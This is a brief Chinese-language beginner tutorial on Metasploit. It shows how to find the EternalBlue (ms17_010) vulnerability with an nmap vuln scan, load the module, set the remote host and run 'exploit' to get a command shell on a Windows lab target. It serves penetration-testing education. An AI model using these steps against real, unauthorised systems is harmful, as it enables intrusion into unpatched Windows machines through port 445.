Metasploit是一款开源的安全漏洞检测工具
The Metasploit Framework的简称 :MSF
MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。
是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。
metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。
首先在kali中输入msfconsole
会出现一些字符组成的小图形 很好玩’
search一下永恒之蓝漏洞补丁的编号 是ms17_010 17表示17年 ms表示微软
你可能会问 这个漏洞编号哪里来的呢
用nmap扫描
nmap --script=vuln 192.168.xxx.xxx
靶机上就能发现四个漏洞补丁没有安装 其中包括 永恒之蓝漏洞
我们直接拿来用 use
可见 命令行前端也发生了变化
我们show options后 发现rhost是空的 所以我们需要自己加上这个远程主机 r:remote(遥远的)
而rport (端口) 可见永恒之蓝是针对445端口的 这个端口常被蠕虫攻击
我们set RHOST [要渗透测试的ip]
再show options可见加上了远程主机
这时候 输入exploit 命令 开始渗透
看 渗透成功 我们成功入侵到了目标windos主机的命令行